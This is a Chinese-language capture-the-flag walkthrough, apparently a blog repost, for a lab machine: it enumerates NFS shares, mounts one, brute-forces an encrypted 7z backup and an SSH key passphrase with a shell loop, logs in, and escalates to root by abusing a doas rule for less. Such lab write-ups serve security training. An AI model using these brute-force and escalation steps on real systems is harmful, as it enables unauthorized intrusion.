靶機下載地址:https://pan.baidu.com/s/1xmZA1xUU_oDTwllIJNSwlA
提款碼:6666
靶機IP地址:192.168.137.128
Kali IP地址:192.168.137.137
獲取靶機開放埠的服務版本資訊
- nmap -sV 192.168.137.128
發現目標系統開啟ssh服務(OpenSSH 7.9)、nsf服務(網路檔案系統)
查看靶機的共享目錄
使用msf中的模塊use auxiliary/scanner/nfs/nfsmount
使用命令查看共享目錄:shutmunt -e 192.168.137.128
遠程掛載靶機的目錄
首先安裝nfspysh
鏈接:https://pan.baidu.com/s/1R5ICg94APAkY8sX_lmDzvQ
提取碼:0nu7
- 進入目錄安裝:
- ./setup.py install
安裝NfSpy-twofour
- 進入目錄安裝:
- ./setup.py install
掛載到showmount查看共享目錄的路徑
- nfspysh -o server=192.168.137.128:/home/user/storage
查看共享目錄的內容,下載backup.7z壓縮包
- ls
解壓backup.7z檔案,發現檔案被加密
- 7z e backup.7z
使用rarcrack對7z類的壓縮包進行爆破
- apt-get install rarcrack
進行爆破
- rarcrack --threads 6 --type 7z backup.7z
獲取到解壓密碼:chocolate
由于爆破的時間過于長久就沒有截圖了,
解壓后獲得8張圖片和ssh公鑰和私鑰
把公鑰復制到/root/.ssh嘗試使用ssh私鑰登錄目標,發現私鑰進行了口令驗證
使用腳本爆破私鑰密碼
- cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt |while read pass;do if ssh-keygen -c -C "user@forandsix" -P $pass -f id_rsa &>/dev/null;then echo $pass; break; fi; done
獲取密碼12345678
對用戶進行ssh登錄
由于是$符號所以直接判定為普通用戶
使用find命令進行查看是否存在可執行的二進制檔案,和帶有s標志位的檔案
發現可以使用可以使用doas(可以代替sudo命令是BSD系列系統的權限管理工具)
- find / -perm 4000 2>/dev/null
- find / -perm -u=s -type f 2> /dev/null
查看doas.conf組態檔資訊
發現當前用戶的權限只能使用less命令查看/var/log/authlog檔案
- doas /usr/bin/less /var/log/authlog
按v進入編輯模式進行普通用戶提權
提權成功,獲得root權限
查找flag
- find / -name flag.txt
獲取得到flag
- flag:acd043bc3103ed3dd02eee99d5b0ff42
實驗結束
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/281152.html
標籤:其他
上一篇:frida rpc遠程呼叫